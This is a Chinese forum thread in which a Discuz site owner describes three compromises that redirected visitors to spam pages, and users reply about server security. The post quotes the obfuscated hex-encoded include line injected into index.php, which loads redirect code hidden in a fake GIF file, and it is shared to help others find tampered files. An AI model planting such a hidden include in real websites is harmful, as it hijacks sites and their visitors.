记录这一年来自己论坛被黑 跳转垃圾网页的问题

lookbear

DZ论坛现在已经是高危的程序
这可能跟多年不更新有关系，从来没有哪个时候像今年一样反复被黑！
目前已经开启了 ESET杀毒软件，希望不会了

在此写下三次论坛网页被修改的样式，以备大家参考！

这三次被黑，表现都是访问网页会跳转到垃圾页面，但是都很隐蔽，有的会偶尔弹出，有的会选择只在手机端弹出等等！

1. config/config_global.php   被篡改
在 config_global.php 文件底部会出现一些超长的不正常代码，对比一下正版文件就可以发现异常

2..htaccess   文件被篡改， 因为已经被删除，记不得添加了哪两句，自行对比下

3.前几天的发生的，  INDEX.PHP 被篡改。

1. @include(PACK('H*','2e2f7374617469632f696d6167652f636f6d6d6f6e2f6e6f696d672e676966'));

复制代码

经过查询，是执行一个

1. @include(PACK('H*','./static/image/common/noimg.gif'));

复制代码

经过查询，noimg.gif根本不是图片，里边存有跳转代码。

多事之秋，各种病毒泛滥，对于DZ这个老程序真是千疮百孔，把这些分享给大家。因为就算你杀了毒，不找出被篡改的文件，也是枉然！

罗永浩

想转WP了，昨晚看了一晚上的主题先收藏起来，到时候移过来

guessxiaohuang

好像也没错哦，HTML5在国外已经被大量网站使用了，看了下discuz内部代码，居然没有跟进，的确慢慢的就落后了

lemon

牛逼网站时常被人掂记，我的网站5 6年都没人来黑。

Killer

文件被修改基本都是服务器本身安全没做好，而非DZ被黑，加强服务器安全防止被入侵是关键，不然任何程序都会被黑的

鸿茂传媒

服务器没有做好安全。

guessxiaohuang

Killer 发表于 2020-3-24 23:13
文件被修改基本都是服务器本身安全没做好，而非DZ被黑，加强服务器安全防止被入侵是关键，不然任何程序都会 ...

我赞同你的说法，discuz安全性我也测试过，99%的攻击方法都没什么用，他的这个应该是FTP密码被别人知道了，然后被上传木马文件，他不彻底清除恶意代码的话，就只能重装了

dss

楼主用哪里的服务器建站？

simonzhd

说的我怕怕的